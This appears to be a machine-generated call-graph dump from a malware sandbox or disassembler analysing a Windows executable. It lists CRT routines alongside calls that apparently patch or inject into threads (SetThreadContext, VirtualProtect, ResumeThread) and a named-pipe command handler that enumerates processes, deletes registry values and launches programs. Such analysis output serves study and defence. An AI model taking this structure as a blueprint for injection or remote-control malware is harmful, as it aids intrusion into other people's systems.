15624->15626 15626->15625 17309 20175ebae42 17310 20175eb9324 __CxxCallCatchBlock 9 API calls 17309->17310 17311 20175ebae4f __CxxCallCatchBlock 17310->17311 17312 20175ebae93 RaiseException 17311->17312 17313 20175ebaeba 17312->17313 17314 20175eb9978 __CxxCallCatchBlock 9 API calls 17313->17314 17318 20175ebaec2 17314->17318 17315 20175ebaeeb __CxxCallCatchBlock 17316 20175eb9324 __CxxCallCatchBlock 9 API calls 17315->17316 17317 20175ebaefe 17316->17317 17319 20175eb9324 __CxxCallCatchBlock 9 API calls 17317->17319 17318->17315 17321 20175eb8ff8 __CxxCallCatchBlock 9 API calls 17318->17321 17320 20175ebaf07 17319->17320 17321->17315 19142 20175ec4848 19145 20175eb904c 19142->19145 19146 20175eb9064 19145->19146 19147 20175eb9076 19145->19147 19146->19147 19148 20175eb906c 19146->19148 19149 20175eb9324 __CxxCallCatchBlock 9 API calls 19147->19149 19151 20175eb9324 __CxxCallCatchBlock 9 API calls 19148->19151 19152 20175eb9074 19148->19152 19150 20175eb907b 19149->19150 19150->19152 19154 20175eb9324 __CxxCallCatchBlock 9 API calls 19150->19154 19153 20175eb909b 19151->19153 19155 20175eb9324 __CxxCallCatchBlock 9 API calls 19153->19155 19154->19152 19156 20175eb90a8 19155->19156 19157 20175ebc2f4 14 API calls 19156->19157 19158 20175eb90b1 19157->19158 19159 20175ebc2f4 14 API calls 19158->19159 19160 20175eb90bd 19159->19160 18777 20175ebad48 18778 20175eb9324 __CxxCallCatchBlock 9 API calls 18777->18778 18779 20175ebad7d 18778->18779 18780 20175eb9324 __CxxCallCatchBlock 9 API calls 18779->18780 18781 20175ebad8b __except_validate_context_record 18780->18781 18782 20175eb9324 __CxxCallCatchBlock 9 API calls 18781->18782 18783 20175ebadcf 18782->18783 18784 20175eb9324 __CxxCallCatchBlock 9 API calls 18783->18784 18785 20175ebadd8 18784->18785 18786 20175eb9324 __CxxCallCatchBlock 9 API calls 18785->18786 18787 20175ebade1 18786->18787 18800 20175eb993c 18787->18800 18790 20175eb9324 __CxxCallCatchBlock 9 API calls 18791 20175ebae11 __CxxCallCatchBlock 18790->18791 18792 20175eb9978 __CxxCallCatchBlock 9 API calls 18791->18792 18796 20175ebaec2 18792->18796 18793 20175ebaeeb __CxxCallCatchBlock 18794 20175eb9324 __CxxCallCatchBlock 9 API calls 18793->18794 18795 20175ebaefe 18794->18795 18797 20175eb9324 __CxxCallCatchBlock 9 API calls 18795->18797 18796->18793 18799 20175eb8ff8 __CxxCallCatchBlock 9 API calls 18796->18799 18798 20175ebaf07 18797->18798 18799->18793 18801 20175eb9324 __CxxCallCatchBlock 9 API calls 18800->18801 18802 20175eb994d 18801->18802 18803 20175eb9958 18802->18803 18804 20175eb9324 __CxxCallCatchBlock 9 API calls 18802->18804 18805 20175eb9324 __CxxCallCatchBlock 9 API calls 18803->18805 18804->18803 18806 20175eb9969 18805->18806 18806->18790 18806->18791 19161 20175ec485e 19162 20175eb9324 __CxxCallCatchBlock 9 API calls 19161->19162 19163 20175ec486c 19162->19163 19164 20175ec4877 19163->19164 19165 20175eb9324 __CxxCallCatchBlock 9 API calls 19163->19165 19165->19164 17343 20175ec465f 17344 20175ec46e2 17343->17344 17345 20175ec4677 17343->17345 17345->17344 17346 20175eb9324 __CxxCallCatchBlock 9 API calls 17345->17346 17347 20175ec46c4 17346->17347 17348 20175eb9324 __CxxCallCatchBlock 9 API calls 17347->17348 17349 20175ec46d9 17348->17349 17350 20175ebc2f4 14 API calls 17349->17350 17350->17344 18821 20175ec3960 18831 20175eb8ca0 18821->18831 18823 20175ec3988 18825 20175eb9324 __CxxCallCatchBlock 9 API calls 18826 20175ec3998 18825->18826 18827 20175eb9324 __CxxCallCatchBlock 9 API calls 18826->18827 18828 20175ec39a1 18827->18828 18829 20175ebc2f4 14 API calls 18828->18829 18830 20175ec39aa 18829->18830 18834 20175eb8cd0 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 18831->18834 18832 20175eb8d94 RtlUnwindEx 18832->18834 18833 20175eb8dd1 18833->18823 18833->18825 18834->18832 18834->18833 16600 20175eb7f60 16601 20175eb7f7c 16600->16601 16602 20175eb7f81 16600->16602 16604 20175eb8090 16601->16604 16605 20175eb80b3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 16604->16605 16606 20175eb8127 16604->16606 16605->16606 16606->16602 17623 20175eb2e54 17625 20175eb2ea8 17623->17625 17624 20175eb2ec3 17625->17624 17627 20175eb37f4 17625->17627 17628 20175eb388a 17627->17628 17630 20175eb3819 17627->17630 17628->17624 17629 20175eb3f88 StrCmpNIW 17629->17630 17630->17628 17630->17629 17631 20175eb1e08 StrCmpIW StrCmpW 17630->17631 17631->17630 17632 20175ebd658 17633 20175ebd67d 17632->17633 17638 20175ebd694 17632->17638 17634 20175ebd1f4 __std_exception_copy 13 API calls 17633->17634 17636 20175ebd682 17634->17636 17635 20175ebd724 17764 20175ebbb54 17635->17764 17637 20175ebd04c _invalid_parameter_noinfo 38 API calls 17636->17637 17661 20175ebd68d 17637->17661 17638->17635 17646 20175ebd7b6 17638->17646 17657 20175ebd6da 17638->17657 17665 20175ebd894 17638->17665 17727 20175ebda18 17638->17727 17642 20175ebd784 17645 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17642->17645 17644 20175ebd836 17647 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17644->17647 17648 20175ebd78b 17645->17648 17652 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17646->17652 17660 20175ebd6fd 17646->17660 17659 20175ebd841 17647->17659 17654 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17648->17654 17648->17660 17649 20175ebd7d7 17649->17644 17649->17649 17662 20175ebd87c 17649->17662 17770 20175ec0eb8 17649->17770 17650 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17650->17661 17651 20175ebd85a 17656 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17651->17656 17652->17646 17653 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17653->17657 17654->17648 17655 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17655->17659 17656->17661 17657->17653 17657->17660 17659->17651 17659->17655 17660->17650 17663 20175ebd06c _invalid_parameter_noinfo 17 API calls 17662->17663 17664 20175ebd891 17663->17664 17666 20175ebd8c2 17665->17666 17666->17666 17667 20175ebd8de 17666->17667 17668 20175ebd220 _invalid_parameter_noinfo 13 API calls 17666->17668 17667->17638 17669 20175ebd90d 17668->17669 17670 20175ebd926 17669->17670 17671 20175ec0eb8 38 API calls 17669->17671 17672 20175ec0eb8 38 API calls 17670->17672 17674 20175ebd9fc 17670->17674 17671->17670 17673 20175ebd943 17672->17673 17673->17674 17676 20175ebd97f 17673->17676 17677 20175ebd98d 17673->17677 17678 20175ebd962 17673->17678 17675 20175ebd06c _invalid_parameter_noinfo 17 API calls 17674->17675 17688 20175ebda17 17675->17688 17680 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17676->17680 17681 20175ebd977 17677->17681 17779 20175ebeee0 17677->17779 17679 20175ebd220 _invalid_parameter_noinfo 13 API calls 17678->17679 17682 20175ebd96d 17679->17682 17680->17674 17681->17676 17685 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17681->17685 17686 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17682->17686 17684 20175ebda7a 17689 20175ebda8c 17684->17689 17696 20175ebdaa1 17684->17696 17685->17676 17686->17681 17687 20175ebd9b5 17690 20175ebd9d0 17687->17690 17691 20175ebd9ba 17687->17691 17688->17684 17788 20175ec13d8 17688->17788 17694 20175ebd894 52 API calls 17689->17694 17693 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17690->17693 17695 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17691->17695 17693->17676 17709 20175ebda9c 17694->17709 17695->17681 17698 20175ebdd78 14 API calls 17696->17698 17697 20175eb8070 _invalid_parameter_noinfo 8 API calls 17699 20175ebdd64 17697->17699 17700 20175ebdb0b 17698->17700 17699->17638 17704 20175ebdb1a 17700->17704 17797 20175ebf198 17700->17797 17801 20175ebd30c 17704->17801 17705 20175ebdba8 17706 20175ebd894 52 API calls 17705->17706 17708 20175ebdbb8 17706->17708 17707 20175ebdd78 14 API calls 17715 20175ebdbd2 17707->17715 17708->17709 17710 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17708->17710 17709->17697 17710->17709 17711 20175ebf198 9 API calls 17711->17715 17713 20175ebd894 52 API calls 17713->17715 17714 20175ebdcc8 FindNextFileW 17714->17715 17716 20175ebdce0 17714->17716 17715->17707 17715->17711 17715->17713 17715->17714 17717 20175ebd2a0 13 API calls Concurrency::details::SchedulerProxy::DeleteThis 17715->17717 17718 20175ebdd2a 17715->17718 17823 20175ebd4ac 17715->17823 17719 20175ebdd0c FindClose 17716->17719 17845 20175ec0b20 17716->17845 17717->17715 17720 20175ebdd38 FindClose 17718->17720 17723 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17718->17723 17719->17709 17722 20175ebdd1c 17719->17722 17720->17709 17724 20175ebdd48 17720->17724 17725 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17722->17725 17723->17720 17726 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17724->17726 17725->17709 17726->17709 17728 20175ebda7a 17727->17728 17729 20175ebda58 17727->17729 17730 20175ebda8c 17728->17730 17733 20175ebdaa1 17728->17733 17729->17728 17731 20175ec13d8 38 API calls 17729->17731 17732 20175ebd894 56 API calls 17730->17732 17731->17729 17746 20175ebda9c 17732->17746 17735 20175ebdd78 14 API calls 17733->17735 17734 20175eb8070 _invalid_parameter_noinfo 8 API calls 17736 20175ebdd64 17734->17736 17737 20175ebdb0b 17735->17737 17736->17638 17738 20175ebdb1a 17737->17738 17739 20175ebf198 9 API calls 17737->17739 17740 20175ebd30c 16 API calls 17738->17740 17739->17738 17741 20175ebdb7b FindFirstFileExW 17740->17741 17742 20175ebdba8 17741->17742 17752 20175ebdbd2 17741->17752 17743 20175ebd894 56 API calls 17742->17743 17745 20175ebdbb8 17743->17745 17744 20175ebdd78 14 API calls 17744->17752 17745->17746 17747 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17745->17747 17746->17734 17747->17746 17748 20175ebf198 9 API calls 17748->17752 17749 20175ebd4ac 16 API calls 17749->17752 17750 20175ebd894 56 API calls 17750->17752 17751 20175ebdcc8 FindNextFileW 17751->17752 17753 20175ebdce0 17751->17753 17752->17744 17752->17748 17752->17749 17752->17750 17752->17751 17754 20175ebd2a0 13 API calls Concurrency::details::SchedulerProxy::DeleteThis 17752->17754 17755 20175ebdd2a 17752->17755 17756 20175ebdd0c FindClose 17753->17756 17758 20175ec0b20 38 API calls 17753->17758 17754->17752 17757 20175ebdd38 FindClose 17755->17757 17760 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17755->17760 17756->17746 17759 20175ebdd1c 17756->17759 17757->17746 17761 20175ebdd48 17757->17761 17758->17756 17762 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17759->17762 17760->17757 17763 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17761->17763 17762->17746 17763->17746 17765 20175ebbb6c 17764->17765 17769 20175ebbba4 17764->17769 17766 20175ebd220 _invalid_parameter_noinfo 13 API calls 17765->17766 17765->17769 17767 20175ebbb9a 17766->17767 17768 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17767->17768 17768->17769 17769->17642 17769->17649 17775 20175ec0ed5 17770->17775 17771 20175ec0eda 17772 20175ebd1f4 __std_exception_copy 13 API calls 17771->17772 17773 20175ec0ef0 17771->17773 17774 20175ec0ee4 17772->17774 17773->17649 17776 20175ebd04c _invalid_parameter_noinfo 38 API calls 17774->17776 17775->17771 17775->17773 17777 20175ec0f24 17775->17777 17776->17773 17777->17773 17778 20175ebd1f4 __std_exception_copy 13 API calls 17777->17778 17778->17774 17780 20175ebef1f 17779->17780 17781 20175ebef02 17779->17781 17782 20175ebef29 17780->17782 17853 20175ec19f0 17780->17853 17781->17780 17783 20175ebef10 17781->17783 17860 20175ec1a40 17782->17860 17785 20175ebd1f4 __std_exception_copy 13 API calls 17783->17785 17787 20175ebef15 17785->17787 17787->17687 17789 20175ec13e0 17788->17789 17790 20175ec13f5 17789->17790 17791 20175ec140e 17789->17791 17792 20175ebd1f4 __std_exception_copy 13 API calls 17790->17792 17793 20175ec1405 17791->17793 17795 20175ebdd78 14 API calls 17791->17795 17794 20175ec13fa 17792->17794 17793->17688 17796 20175ebd04c _invalid_parameter_noinfo 38 API calls 17794->17796 17795->17793 17796->17793 17798 20175ebf1a9 17797->17798 17799 20175ebf1ca 17797->17799 17798->17799 17879 20175ebef88 17798->17879 17799->17704 17802 20175ebd35a 17801->17802 17803 20175ebd336 17801->17803 17804 20175ebd3bf 17802->17804 17805 20175ebd35f 17802->17805 17806 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17803->17806 17811 20175ebd345 FindFirstFileExW 17803->17811 17898 20175ebec58 17804->17898 17808 20175ebd374 17805->17808 17805->17811 17812 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17805->17812 17806->17811 17809 20175ebc5d0 14 API calls 17808->17809 17809->17811 17811->17705 17811->17715 17812->17808 17824 20175ebd4fa 17823->17824 17825 20175ebd4d6 17823->17825 17826 20175ebd55f 17824->17826 17827 20175ebd500 17824->17827 17828 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17825->17828 17830 20175ebd4e5 17825->17830 17901 20175ebece8 17826->17901 17827->17830 17832 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17827->17832 17837 20175ebd515 17827->17837 17828->17830 17830->17715 17832->17837 17833 20175ebc5d0 14 API calls 17833->17830 17837->17833 17846 20175ec0b52 17845->17846 17847 20175ebd1f4 __std_exception_copy 13 API calls 17846->17847 17852 20175ec0b67 17846->17852 17848 20175ec0b5c 17847->17848 17849 20175ebd04c _invalid_parameter_noinfo 38 API calls 17848->17849 17849->17852 17850 20175eb8070 _invalid_parameter_noinfo 8 API calls 17851 20175ec0ea8 17850->17851 17851->17719 17852->17850 17854 20175ec19f9 17853->17854 17855 20175ec1a12 HeapSize 17853->17855 17856 20175ebd1f4 __std_exception_copy 13 API calls 17854->17856 17857 20175ec19fe 17856->17857 17858 20175ebd04c _invalid_parameter_noinfo 38 API calls 17857->17858 17859 20175ec1a09 17858->17859 17859->17782 17861 20175ec1a5f 17860->17861 17862 20175ec1a55 17860->17862 17864 20175ec1a64 17861->17864 17870 20175ec1a6b _invalid_parameter_noinfo 17861->17870 17872 20175ebc5d0 17862->17872 17865 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17864->17865 17868 20175ec1a5d 17865->17868 17866 20175ec1a9e HeapReAlloc 17866->17868 17866->17870 17867 20175ec1a71 17869 20175ebd1f4 __std_exception_copy 13 API calls 17867->17869 17868->17787 17869->17868 17870->17866 17870->17867 17871 20175ebb470 _invalid_parameter_noinfo 2 API calls 17870->17871 17871->17870 17873 20175ebc61b 17872->17873 17878 20175ebc5df _invalid_parameter_noinfo 17872->17878 17875 20175ebd1f4 __std_exception_copy 13 API calls 17873->17875 17874 20175ebc602 HeapAlloc 17876 20175ebc619 17874->17876 17874->17878 17875->17876 17876->17868 17877 20175ebb470 _invalid_parameter_noinfo 2 API calls 17877->17878 17878->17873 17878->17874 17878->17877 17880 20175ebf078 17879->17880 17892 20175ebefbd __vcrt_InitializeCriticalSectionEx 17879->17892 17897 20175ebc558 EnterCriticalSection 17880->17897 17882 20175ebefe2 LoadLibraryExW 17885 20175ebf107 17882->17885 17886 20175ebf007 GetLastError 17882->17886 17884 20175ebf120 GetProcAddress 17884->17880 17885->17884 17887 20175ebf117 FreeLibrary 17885->17887 17886->17892 17887->17884 17892->17880 17892->17882 17892->17884 17895 20175ebf041 LoadLibraryExW 17892->17895 17895->17885 17895->17892 17900 20175ebec61 MultiByteToWideChar 17898->17900 17902 20175ebed0c WideCharToMultiByte 17901->17902 16607 20175eb872c 16610 20175eb90c0 16607->16610 16609 20175eb8755 16611 20175eb9116 16610->16611 16612 20175eb90e1 16610->16612 16611->16609 16612->16611 16614 20175ebc328 16612->16614 16615 20175ebc335 16614->16615 16616 20175ebc33f 16614->16616 16615->16616 16621 20175ebc35a 16615->16621 16617 20175ebd1f4 __std_exception_copy 13 API calls 16616->16617 16618 20175ebc346 16617->16618 16619 20175ebd04c _invalid_parameter_noinfo 38 API calls 16618->16619 16620 20175ebc352 16619->16620 16620->16611 16621->16620 16622 20175ebd1f4 __std_exception_copy 13 API calls 16621->16622 16622->16618 19196 20175ebec30 GetCommandLineA GetCommandLineW 19197 20175eb6430 19198 20175eb643d 19197->19198 19199 20175eb6449 19198->19199 19205 20175eb655a 19198->19205 19200 20175eb64cd 19199->19200 19201 20175eb64a6 SetThreadContext 19199->19201 19201->19200 19202 20175eb663e 19204 20175eb665e 19202->19204 19213 20175eb4b20 19202->19213 19203 20175eb6581 VirtualProtect FlushInstructionCache 19203->19205 19217 20175eb5530 GetCurrentProcess 19204->19217 19205->19202 19205->19203 19208 20175eb66b7 19211 20175eb8070 _invalid_parameter_noinfo 8 API calls 19208->19211 19209 20175eb6677 ResumeThread 19210 20175eb6663 19209->19210 19210->19208 19210->19209 19212 20175eb66ff 19211->19212 19215 20175eb4b3c 19213->19215 19214 20175eb4b9f 19214->19204 19215->19214 19216 20175eb4b52 VirtualFree 19215->19216 19216->19215 19220 20175eb554c 19217->19220 19218 20175eb5593 19218->19210 19219 20175eb5562 VirtualProtect FlushInstructionCache 19219->19220 19220->19218 19220->19219 19269 20175ebc828 19270 20175ebc82d 19269->19270 19271 20175ebc842 19269->19271 19275 20175ebc848 19270->19275 19276 20175ebc88a 19275->19276 19277 20175ebc892 19275->19277 19278 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19276->19278 19279 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19277->19279 19278->19277 19280 20175ebc89f 19279->19280 19281 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19280->19281 19282 20175ebc8ac 19281->19282 19283 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19282->19283 19284 20175ebc8b9 19283->19284 19285 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19284->19285 19286 20175ebc8c6 19285->19286 19287 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19286->19287 19288 20175ebc8d3 19287->19288 19289 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19288->19289 19290 20175ebc8e0 19289->19290 19291 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19290->19291 19292 20175ebc8ed 19291->19292 19293 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19292->19293 19294 20175ebc8fd 19293->19294 19295 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 19294->19295 19296 20175ebc90d 19295->19296 19301 20175ebc6f8 19296->19301 19315 20175ebc558 EnterCriticalSection 19301->19315 17913 20175eb1e3c LoadLibraryA GetProcAddress 17914 20175eb1e6f 17913->17914 17915 20175eb1e62 Sleep 17913->17915 17915->17915 16662 20175ebff40 16663 20175ebff4b 16662->16663 16671 20175ec2c24 16663->16671 16684 20175ebc558 EnterCriticalSection 16671->16684 19318 20175ebf440 GetProcessHeap 18835 20175ebbd34 18836 20175ebbd49 18835->18836 18837 20175ebbd4d 18835->18837 18838 20175ebe864 56 API calls 18837->18838 18839 20175ebbd52 18838->18839 18850 20175ebedc8 GetEnvironmentStringsW 18839->18850 18842 20175ebbd6b 18870 20175ebbda8 18842->18870 18843 20175ebbd5f 18844 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18843->18844 18844->18836 18847 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18848 20175ebbd92 18847->18848 18849 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18848->18849 18849->18836 18851 20175ebbd57 18850->18851 18852 20175ebedf8 18850->18852 18851->18842 18851->18843 18852->18852 18853 20175ebece8 WideCharToMultiByte 18852->18853 18854 20175ebee49 18853->18854 18855 20175ebee53 FreeEnvironmentStringsW 18854->18855 18856 20175ebc5d0 14 API calls 18854->18856 18855->18851 18857 20175ebee63 18856->18857 18858 20175ebee6b 18857->18858 18859 20175ebee74 18857->18859 18860 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18858->18860 18861 20175ebece8 WideCharToMultiByte 18859->18861 18862 20175ebee72 18860->18862 18863 20175ebee97 18861->18863 18862->18855 18864 20175ebee9b 18863->18864 18865 20175ebeea5 18863->18865 18866 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18864->18866 18867 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18865->18867 18868 20175ebeea3 FreeEnvironmentStringsW 18866->18868 18867->18868 18868->18851 18871 20175ebbdcd 18870->18871 18872 20175ebd220 _invalid_parameter_noinfo 13 API calls 18871->18872 18883 20175ebbe03 18872->18883 18873 20175ebbe0b 18874 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18873->18874 18876 20175ebbd73 18874->18876 18875 20175ebbe6d 18877 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18875->18877 18876->18847 18877->18876 18878 20175ebd220 _invalid_parameter_noinfo 13 API calls 18878->18883 18879 20175ebbe92 18880 20175ebbebc 13 API calls 18879->18880 18882 20175ebbe9a 18880->18882 18881 20175ebc328 __std_exception_copy 38 API calls 18881->18883 18885 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18882->18885 18883->18873 18883->18875 18883->18878 18883->18879 18883->18881 18884 20175ebbea6 18883->18884 18886 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18883->18886 18887 20175ebd06c _invalid_parameter_noinfo 17 API calls 18884->18887 18885->18873 18886->18883 18888 20175ebbeb9 18887->18888 18889 20175eebd34 18890 20175eebd4d 18889->18890 18891 20175eebd49 18889->18891 18892 20175eee864 56 API calls 18890->18892 18893 20175eebd52 18892->18893 18904 20175eeedc8 GetEnvironmentStringsW 18893->18904 18896 20175eebd5f 18898 20175eed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18896->18898 18897 20175eebd6b 18924 20175eebda8 18897->18924 18898->18891 18901 20175eed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18902 20175eebd92 18901->18902 18903 20175eed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18902->18903 18903->18891 18905 20175eeedf8 18904->18905 18906 20175eebd57 18904->18906 18907 20175eeece8 WideCharToMultiByte 18905->18907 18906->18896 18906->18897 18908 20175eeee49 18907->18908 18909 20175eeee53 FreeEnvironmentStringsW 18908->18909 18910 20175eec5d0 14 API calls 18908->18910 18909->18906 18911 20175eeee63 18910->18911 18912 20175eeee6b 18911->18912 18913 20175eeee74 18911->18913 18914 20175eed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18912->18914 18915 20175eeece8 WideCharToMultiByte 18913->18915 18916 20175eeee72 18914->18916 18917 20175eeee97 18915->18917 18916->18909 18918 20175eeee9b 18917->18918 18919 20175eeeea5 18917->18919 18921 20175eed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18918->18921 18920 20175eed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18919->18920 18922 20175eeeea3 FreeEnvironmentStringsW 18920->18922 18921->18922 18922->18906 18925 20175eebdcd 18924->18925 18926 20175eed220 _invalid_parameter_noinfo 13 API calls 18925->18926 18936 20175eebe03 18926->18936 18927 20175eed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18928 20175eebd73 18927->18928 18928->18901 18929 20175eebe6d 18930 20175eed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18929->18930 18930->18928 18931 20175eed220 _invalid_parameter_noinfo 13 API calls 18931->18936 18932 20175eebe92 18933 20175eebebc 13 API calls 18932->18933 18935 20175eebe9a 18933->18935 18934 20175eec328 __std_exception_copy 38 API calls 18934->18936 18937 20175eed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18935->18937 18936->18929 18936->18931 18936->18932 18936->18934 18938 20175eebea6 18936->18938 18939 20175eebe0b 18936->18939 18941 20175eed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18936->18941 18937->18939 18940 20175eed06c _invalid_parameter_noinfo 17 API calls 18938->18940 18939->18927 18942 20175eebeb9 18940->18942 18941->18936 16685 20175eb8f0c 16692 20175eb946c 16685->16692 16688 20175eb8f19 16693 20175eb9474 16692->16693 16695 20175eb94a5 16693->16695 16696 20175eb8f15 16693->16696 16709 20175eb9d28 16693->16709 16697 20175eb94b4 __vcrt_uninitialize_locks DeleteCriticalSection 16695->16697 16696->16688 16698 20175eb9400 16696->16698 16697->16696 16714 20175eb9bfc 16698->16714 16710 20175eb9aac __vcrt_InitializeCriticalSectionEx 5 API calls 16709->16710 16711 20175eb9d5e 16710->16711 16712 20175eb9d73 InitializeCriticalSectionAndSpinCount 16711->16712 16713 20175eb9d68 16711->16713 16712->16713 16713->16693 16715 20175eb9aac __vcrt_InitializeCriticalSectionEx 5 API calls 16714->16715 16716 20175eb9c21 TlsAlloc 16715->16716 17919 20175eb820c 17926 20175eb8f34 17919->17926 17922 20175eb8219 17927 20175eb9340 __CxxCallCatchBlock 9 API calls 17926->17927 17928 20175eb8215 17927->17928 17928->17922 17929 20175ebc288 17928->17929 17930 20175ebcb10 __std_exception_copy 13 API calls 17929->17930 17931 20175eb8222 17930->17931 17931->17922 17932 20175eb8f48 17931->17932 17935 20175eb92dc 17932->17935 17934 20175eb8f51 17934->17922 17936 20175eb9302 17935->17936 17937 20175eb92ed 17935->17937 17936->17934 17938 20175eb9c8c __CxxCallCatchBlock 6 API calls 17937->17938 17939 20175eb92f2 17938->17939 17941 20175eb9cd4 17939->17941 17942 20175eb9aac __vcrt_InitializeCriticalSectionEx 5 API calls 17941->17942 17943 20175eb9d02 17942->17943 17944 20175eb9d0c 17943->17944 17945 20175eb9d14 TlsSetValue 17943->17945 17944->17936 17945->17944 18951 20175ebc510 18952 20175ebc518 18951->18952 18954 20175ebc545 18952->18954 18955 20175ebc574 18952->18955 18956 20175ebc59f 18955->18956 18957 20175ebc582 DeleteCriticalSection 18956->18957 18958 20175ebc5a3 18956->18958 18957->18956 18958->18954 15645 140002cb0 15646 140002cbd 15645->15646 15647 140002300 6 API calls 15646->15647 15648 140002cd2 Sleep 15646->15648 15649 140002cdd ConnectNamedPipe 15646->15649 15647->15646 15648->15646 15650 140002d21 Sleep 15649->15650 15651 140002cec ReadFile 15649->15651 15652 140002d2c DisconnectNamedPipe 15650->15652 15651->15652 15653 140002d0f 15651->15653 15652->15649 15653->15652 15655 140003204 15653->15655 15656 14000322b 15655->15656 15657 14000341d 15655->15657 15658 140003231 15656->15658 15659 14000338b GetProcessHeap HeapAlloc K32EnumProcesses 15656->15659 15660 140003599 ReadFile 15657->15660 15661 140003429 15657->15661 15663 140003382 ExitProcess 15658->15663 15664 14000323d 15658->15664 15662 1400032ce 15659->15662 15685 1400033c9 15659->15685 15660->15662 15665 1400035c3 15660->15665 15666 140003432 15661->15666 15667 14000358f 15661->15667 15662->15653 15669 140003246 15664->15669 15670 1400032ea RegOpenKeyExW 15664->15670 15665->15662 15671 1400035d0 GetProcessHeap HeapAlloc 15665->15671 15672 140003534 15666->15672 15673 14000343e 15666->15673 15668 140001f7c 22 API calls 15667->15668 15678 1400032c9 15668->15678 15669->15662 15690 140003260 ReadFile 15669->15690 15676 140003353 15670->15676 15677 140003317 RegDeleteValueW RegDeleteValueW RegDeleteValueW 15670->15677 15679 140001cf0 13 API calls 15671->15679 15674 1400020fc ReadFile 15672->15674 15680 140003443 15673->15680 15681 140003480 15673->15681 15683 140003543 15674->15683 15675 140001868 31 API calls 15675->15685 15717 14000217c SysAllocString SysAllocString CoInitializeEx 15676->15717 15677->15676 15678->15662 15697 140003609 15679->15697 15680->15662 15682 14000344f 15680->15682 15733 1400020fc 15681->15733 15730 140002c5c 15682->15730 15683->15662 15693 1400020fc ReadFile 15683->15693 15685->15662 15685->15675 15689 14000335f 15695 14000217c 9 API calls 15689->15695 15690->15662 15696 14000328a 15690->15696 15691 14000363e GetProcessHeap HeapFree 15691->15662 15699 14000355a 15693->15699 15694 140003497 ReadFile 15694->15662 15700 1400034bf 15694->15700 15701 14000336b 15695->15701 15696->15662 15707 140001868 31 API calls 15696->15707 15697->15691 15702 14000352f 15697->15702 15765 140001eec 15697->15765 15699->15662 15704 140003562 ShellExecuteW 15699->15704 15700->15662 15705 1400034cc GetProcessHeap HeapAlloc ReadFile 15700->15705 15725 140001f7c GetProcessHeap HeapAlloc 15701->15725 15702->15691 15704->15662 15705->15691 15710 140003510 15705->15710 15708 1400032b0 